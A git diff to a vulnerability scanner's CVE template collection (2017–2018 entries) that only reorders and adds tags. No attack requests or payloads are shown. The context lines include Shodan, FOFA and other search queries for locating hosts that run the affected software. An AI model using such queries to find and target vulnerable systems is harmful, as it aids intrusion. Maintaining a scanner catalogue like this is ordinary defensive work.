diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml
index 4adc2176e9..11c3dd68dc 100644
--- a/http/cves/2017/CVE-2017-17059.yaml
+++ b/http/cves/2017/CVE-2017-17059.yaml
@@ -26,7 +26,7 @@ info:
vendor: amtythumb_project
product: amtythumb
framework: wordpress
- tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress,amtythumb_project
+ tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project
http:
- method: POST
diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml
index 60f4ad3759..264a9fa1d6 100644
--- a/http/cves/2017/CVE-2017-17731.yaml
+++ b/http/cves/2017/CVE-2017-17731.yaml
@@ -29,7 +29,7 @@ info:
product: dedecms
shodan-query: http.html:"DedeCms"
fofa-query: app="DedeCMS"
- tags: sqli,dedecms
+ tags: cve,cve2017,sqli,dedecms
variables:
num: "999999999"
diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml
index a0a8240e5b..c1a58f47ac 100644
--- a/http/cves/2017/CVE-2017-17736.yaml
+++ b/http/cves/2017/CVE-2017-17736.yaml
@@ -28,7 +28,7 @@ info:
vendor: kentico
product: kentico_cms
google-query: intitle:"kentico database setup"
- tags: cve,cve2017,kentico,cms,install,unauth,edb
+ tags: cve2017,cve,kentico,cms,install,unauth,edb
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml
index d980b4e413..a4eb62ddb4 100644
--- a/http/cves/2017/CVE-2017-18024.yaml
+++ b/http/cves/2017/CVE-2017-18024.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: avantfax
product: avantfax
- tags: avantfax,hackerone,packetstorm,cve,cve2017,xss
+ tags: cve,cve2017,avantfax,hackerone,packetstorm,xss
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml
index d11eae063b..d20b7a206e 100644
--- a/http/cves/2017/CVE-2017-18492.yaml
+++ b/http/cves/2017/CVE-2017-18492.yaml
@@ -26,7 +26,7 @@ info:
product: contact_form_to_db
framework: wordpress
publicwww-query: "/wp-content/plugins/contact-form-to-db/"
- tags: cve,cve2017,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft
+ tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml
index 03ef01f738..569681015e 100644
--- a/http/cves/2017/CVE-2017-18500.yaml
+++ b/http/cves/2017/CVE-2017-18500.yaml
@@ -26,7 +26,7 @@ info:
product: social_buttons_pack
framework: wordpress
publicwww-query: "/wp-content/plugins/social-buttons-pack/"
- tags: cve,cve2017,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft
+ tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml
index 5818a5a229..ada7e354cd 100644
--- a/http/cves/2017/CVE-2017-18501.yaml
+++ b/http/cves/2017/CVE-2017-18501.yaml
@@ -26,7 +26,7 @@ info:
product: social_login
framework: wordpress
publicwwww-query: "/wp-content/plugins/social-login-bws/"
- tags: cve,cve2017,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft
+ tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml
index b2ec89a2e9..e03b342129 100644
--- a/http/cves/2017/CVE-2017-18502.yaml
+++ b/http/cves/2017/CVE-2017-18502.yaml
@@ -26,7 +26,7 @@ info:
product: subscriber
framework: wordpress
publicwww-query: "/wp-content/plugins/subscriber/"
- tags: cve,cve2017,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft
+ tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml
index 1f08cd3920..b2ff9bbfe6 100644
--- a/http/cves/2017/CVE-2017-18516.yaml
+++ b/http/cves/2017/CVE-2017-18516.yaml
@@ -27,7 +27,7 @@ info:
product: linkedin
framework: wordpress
publicwww-query: "/wp-content/plugins/bws-linkedin/"
- tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft
+ tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml
index 6aedd597c4..2b7b4fe77d 100644
--- a/http/cves/2017/CVE-2017-18527.yaml
+++ b/http/cves/2017/CVE-2017-18527.yaml
@@ -26,7 +26,7 @@ info:
product: pagination
framework: wordpress
publicwww-query: "/wp-content/plugins/pagination/"
- tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft
+ tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml
index 103e1b5117..ee4214faa9 100644
--- a/http/cves/2017/CVE-2017-18530.yaml
+++ b/http/cves/2017/CVE-2017-18530.yaml
@@ -26,7 +26,7 @@ info:
product: rating
framework: wordpress
publicwww-query: "/wp-content/plugins/rating-bws/"
- tags: cve,cve2017,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft
+ tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml
index 6228a0c036..c519621063 100644
--- a/http/cves/2017/CVE-2017-18536.yaml
+++ b/http/cves/2017/CVE-2017-18536.yaml
@@ -26,7 +26,7 @@ info:
vendor: fullworks
product: stop_user_enumeration
framework: wordpress
- tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin,fullworks
+ tags: cve2017,cve,wpscan,wordpress,xss,wp-plugin,fullworks
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml
index f9071584c3..1e31feabd4 100644
--- a/http/cves/2017/CVE-2017-18556.yaml
+++ b/http/cves/2017/CVE-2017-18556.yaml
@@ -27,7 +27,7 @@ info:
product: google_analytics
framework: wordpress
publicwww-query: "/wp-content/plugins/bws-google-analytics/"
- tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft
+ tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml
index 6dc1b630f6..ec47a8a2b7 100644
--- a/http/cves/2017/CVE-2017-18558.yaml
+++ b/http/cves/2017/CVE-2017-18558.yaml
@@ -26,7 +26,7 @@ info:
product: testimonials
framework: wordpress
publicwww-query: "/wp-content/plugins/bws-testimonials/"
- tags: cve,cve2017,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft
+ tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml
index f8acbd0b2a..837fd15ae8 100644
--- a/http/cves/2017/CVE-2017-18565.yaml
+++ b/http/cves/2017/CVE-2017-18565.yaml
@@ -26,7 +26,7 @@ info:
product: updater
framework: wordpress
publicwww-query: "/wp-content/plugins/updater/"
- tags: cve,cve2017,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft
+ tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml
index 258c5ab66a..55ce465598 100644
--- a/http/cves/2017/CVE-2017-18598.yaml
+++ b/http/cves/2017/CVE-2017-18598.yaml
@@ -27,7 +27,7 @@ info:
vendor: designmodo
product: qards
framework: wordpress
- tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss,designmodo
+ tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml
index af4e613608..46f1aa9c36 100644
--- a/http/cves/2017/CVE-2017-3506.yaml
+++ b/http/cves/2017/CVE-2017-3506.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: oracle
product: weblogic_server
- tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle
+ tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml
index 33a6155783..a996addcb7 100644
--- a/http/cves/2017/CVE-2017-3528.yaml
+++ b/http/cves/2017/CVE-2017-3528.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: oracle
product: applications_framework
- tags: oracle,redirect,edb,cve,cve2017
+ tags: cve,cve2017,oracle,redirect,edb
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml
index c96a2cf7c9..2f91fccbf6 100644
--- a/http/cves/2017/CVE-2017-5487.yaml
+++ b/http/cves/2017/CVE-2017-5487.yaml
@@ -29,7 +29,7 @@ info:
vendor: wordpress
product: wordpress
shodan-query: http.component:"WordPress"
- tags: cve,cve2017,wordpress,wp,edb
+ tags: cve2017,cve,wordpress,wp,edb
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml
index 37e6657b09..b9b7acbd62 100644
--- a/http/cves/2017/CVE-2017-5631.yaml
+++ b/http/cves/2017/CVE-2017-5631.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: kmc_information_systems
product: caseaware
- tags: edb,cve,cve2017,xss,caseaware,kmc_information_systems
+ tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml
index f89dc4f11d..652d0f369b 100644
--- a/http/cves/2017/CVE-2017-5638.yaml
+++ b/http/cves/2017/CVE-2017-5638.yaml
@@ -30,7 +30,7 @@ info:
vendor: apache
product: struts
shodan-query: html:"Apache Struts"
- tags: cve,cve2017,apache,kev,msf,struts,rce
+ tags: cve2017,cve,apache,kev,msf,struts,rce
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml
index c2c9cb07a3..1b9a0a64a3 100644
--- a/http/cves/2017/CVE-2017-5689.yaml
+++ b/http/cves/2017/CVE-2017-5689.yaml
@@ -29,7 +29,7 @@ info:
vendor: intel
product: active_management_technology_firmware
shodan-query: title:"Active Management Technology"
- tags: cve,cve2017,amt,intel,tenable,kev
+ tags: cve2017,cve,amt,intel,tenable,kev
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml
index 582ac0dd8a..eb86a88b64 100644
--- a/http/cves/2017/CVE-2017-5982.yaml
+++ b/http/cves/2017/CVE-2017-5982.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: kodi
product: kodi
- tags: cve2017,kodi,lfi,edb,cve
+ tags: cve2017,cve,kodi,lfi,edb
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml
index 164fb4fc21..90a7e52c34 100644
--- a/http/cves/2017/CVE-2017-6090.yaml
+++ b/http/cves/2017/CVE-2017-6090.yaml
@@ -26,7 +26,7 @@ info:
vendor: phpcollab
product: phpcollab
shodan-query: http.title:"PhpCollab"
- tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive
+ tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml
index 05f932de93..770acc1320 100644
--- a/http/cves/2017/CVE-2017-7269.yaml
+++ b/http/cves/2017/CVE-2017-7269.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: microsoft
product: internet_information_server
- tags: cve,cve2017,rce,windows,iis,kev,microsoft
+ tags: cve2017,cve,rce,windows,iis,kev,microsoft
http:
- method: OPTIONS
diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml
index 94ddb0d403..13be80d787 100644
--- a/http/cves/2017/CVE-2017-7391.yaml
+++ b/http/cves/2017/CVE-2017-7391.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: magmi_project
product: magmi
- tags: cve,cve2017,magmi,xss,magmi_project
+ tags: cve2017,cve,magmi,xss,magmi_project
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml
index 32b4768733..380effb48a 100644
--- a/http/cves/2017/CVE-2017-8229.yaml
+++ b/http/cves/2017/CVE-2017-8229.yaml
@@ -30,7 +30,7 @@ info:
product: ipm-721s_firmware
shodan-query: html:"Amcrest"
fofa-query: "Amcrest"
- tags: packetstorm,seclists,cve,cve2017,amcrest,iot
+ tags: cve2017,cve,packetstorm,seclists,amcrest,iot
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml
index df6368bd23..aa23b0b8cd 100644
--- a/http/cves/2017/CVE-2017-8917.yaml
+++ b/http/cves/2017/CVE-2017-8917.yaml
@@ -29,7 +29,7 @@ info:
vendor: joomla
product: joomla\!
shodan-query: http.component:"Joomla"
- tags: cve,cve2017,joomla,sqli
+ tags: cve2017,cve,joomla,sqli
variables:
num: "999999999"
diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml
index 7d0ad11159..e16de26671 100644
--- a/http/cves/2017/CVE-2017-9140.yaml
+++ b/http/cves/2017/CVE-2017-9140.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: progress
product: telerik_reporting
- tags: cve,cve2017,xss,telerik,progress
+ tags: cve2017,cve,xss,telerik,progress
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml
index 497bb7d292..5fbff88165 100644
--- a/http/cves/2017/CVE-2017-9288.yaml
+++ b/http/cves/2017/CVE-2017-9288.yaml
@@ -28,7 +28,7 @@ info:
vendor: raygun
product: raygun4wp
framework: wordpress
- tags: cve,cve2017,wordpress,xss,wp-plugin,raygun
+ tags: cve2017,cve,wordpress,xss,wp-plugin,raygun
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml
index 11c7eb248e..3b7ddc7e49 100644
--- a/http/cves/2017/CVE-2017-9416.yaml
+++ b/http/cves/2017/CVE-2017-9416.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: odoo
product: odoo
- tags: cve,cve2017,odoo,lfi
+ tags: cve2017,cve,odoo,lfi
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml
index 1e534b42da..55e59504db 100644
--- a/http/cves/2017/CVE-2017-9791.yaml
+++ b/http/cves/2017/CVE-2017-9791.yaml
@@ -31,7 +31,7 @@ info:
product: struts
shodan-query: title:"Struts2 Showcase"
fofa-query: title="Struts2 Showcase"
- tags: cve,cve2017,apache,rce,struts,kev
+ tags: cve2017,cve,apache,rce,struts,kev
variables:
num1: "{{rand_int(40000, 44800)}}"
num2: "{{rand_int(40000, 44800)}}"
diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml
index cbbec7ac42..af1381ac5a 100644
--- a/http/cves/2017/CVE-2017-9822.yaml
+++ b/http/cves/2017/CVE-2017-9822.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: dnnsoftware
product: dotnetnuke
- tags: packetstorm,cve,cve2017,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware
+ tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml
index 9f4a7adbec..6ed93627a5 100644
--- a/http/cves/2017/CVE-2017-9833.yaml
+++ b/http/cves/2017/CVE-2017-9833.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: boa
product: boa
- tags: boa,lfr,lfi,cve,cve2017,edb
+ tags: cve,cve2017,boa,lfr,lfi,edb
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml
index d3cc71b009..8eccec72e5 100644
--- a/http/cves/2017/CVE-2017-9841.yaml
+++ b/http/cves/2017/CVE-2017-9841.yaml
@@ -25,7 +25,7 @@ info:
max-request: 6
vendor: phpunit_project
product: phpunit
- tags: cve,cve2017,php,phpunit,rce,kev,phpunit_project
+ tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml
index 83e657f4d0..bdae46a82c 100644
--- a/http/cves/2018/CVE-2018-0296.yaml
+++ b/http/cves/2018/CVE-2018-0296.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: cisco
product: adaptive_security_appliance_software
- tags: edb,cve,cve2018,cisco,lfi,traversal,asa,kev
+ tags: cve2018,cve,edb,cisco,lfi,traversal,asa,kev
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml
index c00a43fb41..97e06709f9 100644
--- a/http/cves/2018/CVE-2018-1000129.yaml
+++ b/http/cves/2018/CVE-2018-1000129.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: jolokia
product: jolokia
- tags: cve,cve2018,jolokia,xss
+ tags: cve2018,cve,jolokia,xss
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml
index 8b7ba62b87..9c0bdd0331 100644
--- a/http/cves/2018/CVE-2018-1000130.yaml
+++ b/http/cves/2018/CVE-2018-1000130.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: jolokia
product: webarchive_agent
- tags: cve,cve2018,jolokia,rce,jndi,proxy
+ tags: cve2018,cve,jolokia,rce,jndi,proxy
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml
index f2375e142c..450f876702 100644
--- a/http/cves/2018/CVE-2018-1000226.yaml
+++ b/http/cves/2018/CVE-2018-1000226.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: cobblerd
product: cobbler
- tags: cve,cve2018,cobbler,auth-bypass,cobblerd
+ tags: cve2018,cve,cobbler,auth-bypass,cobblerd
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml
index a33ea7639e..78662675f4 100644
--- a/http/cves/2018/CVE-2018-1000533.yaml
+++ b/http/cves/2018/CVE-2018-1000533.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: gitlist
product: gitlist
- tags: git,cve,cve2018,gitlist,vulhub,rce
+ tags: cve,cve2018,git,gitlist,vulhub,rce
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml
index b072657853..9536358671 100644
--- a/http/cves/2018/CVE-2018-1000856.yaml
+++ b/http/cves/2018/CVE-2018-1000856.yaml
@@ -26,7 +26,7 @@ info:
max-request: 3
vendor: domainmod
product: domainmod
- tags: cve,cve2018,domainmod,xss,authenticated
+ tags: cve2018,cve,domainmod,xss,authenticated
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml
index b86a645e7e..7979843f0d 100644
--- a/http/cves/2018/CVE-2018-1000861.yaml
+++ b/http/cves/2018/CVE-2018-1000861.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: jenkins
product: jenkins
- tags: packetstorm,kev,vulhub,cve,cve2018,rce,jenkins
+ tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml
index e7c5711f9f..de5a0a9ac3 100644
--- a/http/cves/2018/CVE-2018-10095.yaml
+++ b/http/cves/2018/CVE-2018-10095.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: dolibarr
product: dolibarr
- tags: cve,cve2018,xss,dolibarr
+ tags: cve2018,cve,xss,dolibarr
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml
index 73ab51ed55..1338e2f6e5 100644
--- a/http/cves/2018/CVE-2018-10201.yaml
+++ b/http/cves/2018/CVE-2018-10201.yaml
@@ -27,7 +27,7 @@ info:
max-request: 4
vendor: ncomputing
product: vspace_pro
- tags: cve2018,ncomputing,lfi,packetstorm,cve
+ tags: cve,cve2018,ncomputing,lfi,packetstorm
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml
index f3fa73c233..3405527fc5 100644
--- a/http/cves/2018/CVE-2018-10822.yaml
+++ b/http/cves/2018/CVE-2018-10822.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: dlink
product: dwr-116_firmware
- tags: dlink,edb,seclists,cve,cve2018,lfi,router
+ tags: cve2018,cve,dlink,edb,seclists,lfi,router
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml
index 1b179af403..0fc3ff3ccd 100644
--- a/http/cves/2018/CVE-2018-10823.yaml
+++ b/http/cves/2018/CVE-2018-10823.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: dlink
product: dwr-116_firmware
- tags: cve2018,rce,iot,dlink,router,edb,seclists,cve
+ tags: cve,cve2018,rce,iot,dlink,router,edb,seclists
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml
index 70d8dba8fd..eb1422c95f 100644
--- a/http/cves/2018/CVE-2018-10956.yaml
+++ b/http/cves/2018/CVE-2018-10956.yaml
@@ -28,7 +28,7 @@ info:
vendor: ipconfigure
product: orchid_core_vms
shodan-query: http.title:"Orchid Core VMS"
- tags: cve,cve2018,orchid,vms,lfi,edb,ipconfigure
+ tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml
index 3c752fbbc9..de63478b34 100644
--- a/http/cves/2018/CVE-2018-11409.yaml
+++ b/http/cves/2018/CVE-2018-11409.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: splunk
product: splunk
- tags: edb,cve,cve2018,splunk
+ tags: cve,cve2018,edb,splunk
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml
index 08255b6ab6..7e444986fa 100644
--- a/http/cves/2018/CVE-2018-11759.yaml
+++ b/http/cves/2018/CVE-2018-11759.yaml
@@ -29,7 +29,7 @@ info:
vendor: apache
product: tomcat_jk_connector
shodan-query: title:"Apache Tomcat"
- tags: cve,cve2018,apache,tomcat,httpd,mod-jk
+ tags: cve2018,cve,apache,tomcat,httpd,mod-jk
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml
index c2bff933dd..6fe542525f 100644
--- a/http/cves/2018/CVE-2018-11776.yaml
+++ b/http/cves/2018/CVE-2018-11776.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: apache
product: struts
- tags: packetstorm,cve,cve2018,apache,rce,struts,kev
+ tags: cve,cve2018,packetstorm,apache,rce,struts,kev
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml
index eaaa87a95e..cfd2104aea 100644
--- a/http/cves/2018/CVE-2018-11784.yaml
+++ b/http/cves/2018/CVE-2018-11784.yaml
@@ -29,7 +29,7 @@ info:
vendor: apache
product: tomcat
shodan-query: title:"Apache Tomcat"
- tags: packetstorm,tomcat,redirect,cve,cve2018,apache
+ tags: cve,cve2018,packetstorm,tomcat,redirect,apache
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml
index f41b076bb3..fd5cdcf5e1 100644
--- a/http/cves/2018/CVE-2018-12031.yaml
+++ b/http/cves/2018/CVE-2018-12031.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: eaton
product: intelligent_power_manager
- tags: edb,cve,cve2018,lfi,eaton
+ tags: cve,cve2018,edb,lfi,eaton
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml
index 57c97ce58e..8c74a61c99 100644
--- a/http/cves/2018/CVE-2018-1207.yaml
+++ b/http/cves/2018/CVE-2018-1207.yaml
@@ -30,7 +30,7 @@ info:
max-request: 1
vendor: dell
product: emc_idrac7
- tags: cve,cve2018,dell,injection,rce
+ tags: cve2018,cve,dell,injection,rce
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml
index 07a2417384..01b9be0edd 100644
--- a/http/cves/2018/CVE-2018-12095.yaml
+++ b/http/cves/2018/CVE-2018-12095.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: oecms_project
product: oecms
- tags: cve,cve2018,xss,edb,oecms_project
+ tags: cve2018,cve,xss,edb,oecms_project
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml
index 961af41ca2..ca6b0166d2 100644
--- a/http/cves/2018/CVE-2018-12300.yaml
+++ b/http/cves/2018/CVE-2018-12300.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: seagate
product: nas_os
- tags: cve,cve2018,redirect,seagate,nasos
+ tags: cve2018,cve,redirect,seagate,nasos
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml
index 966099b72f..743d3fde78 100644
--- a/http/cves/2018/CVE-2018-12613.yaml
+++ b/http/cves/2018/CVE-2018-12613.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: phpmyadmin
product: phpmyadmin
- tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi
+ tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml
index 36d27fb37b..7aa0701a2a 100644
--- a/http/cves/2018/CVE-2018-1335.yaml
+++ b/http/cves/2018/CVE-2018-1335.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: apache
product: tika
- tags: packetstorm,edb,cve,cve2018,apache,tika,rce,intrusive
+ tags: cve,cve2018,packetstorm,edb,apache,tika,rce,intrusive
http:
- method: PUT
diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml
index c2515f4352..c2cc6810c3 100644
--- a/http/cves/2018/CVE-2018-13379.yaml
+++ b/http/cves/2018/CVE-2018-13379.yaml
@@ -27,7 +27,7 @@ info:
vendor: fortinet
product: fortios
shodan-query: http.html:"/remote/login" "xxxxxxxx"
- tags: cve,cve2018,fortios,lfi,kev,fortinet
+ tags: cve2018,cve,fortios,lfi,kev,fortinet
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml
index 6e743b4d21..96d7331ee8 100644
--- a/http/cves/2018/CVE-2018-13980.yaml
+++ b/http/cves/2018/CVE-2018-13980.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: zeta-producer
product: zeta_producer
- tags: cve,cve2018,lfi,edb,packetstorm,zeta-producer
+ tags: cve2018,cve,lfi,edb,packetstorm,zeta-producer
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml
index d5ae6c991f..e5b69b320f 100644
--- a/http/cves/2018/CVE-2018-14064.yaml
+++ b/http/cves/2018/CVE-2018-14064.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: velotismart_project
product: velotismart_wifi_firmware
- tags: edb,cve,cve2018,lfi,camera,iot,velotismart_project
+ tags: cve2018,cve,edb,lfi,camera,iot,velotismart_project
http:
- method: GET
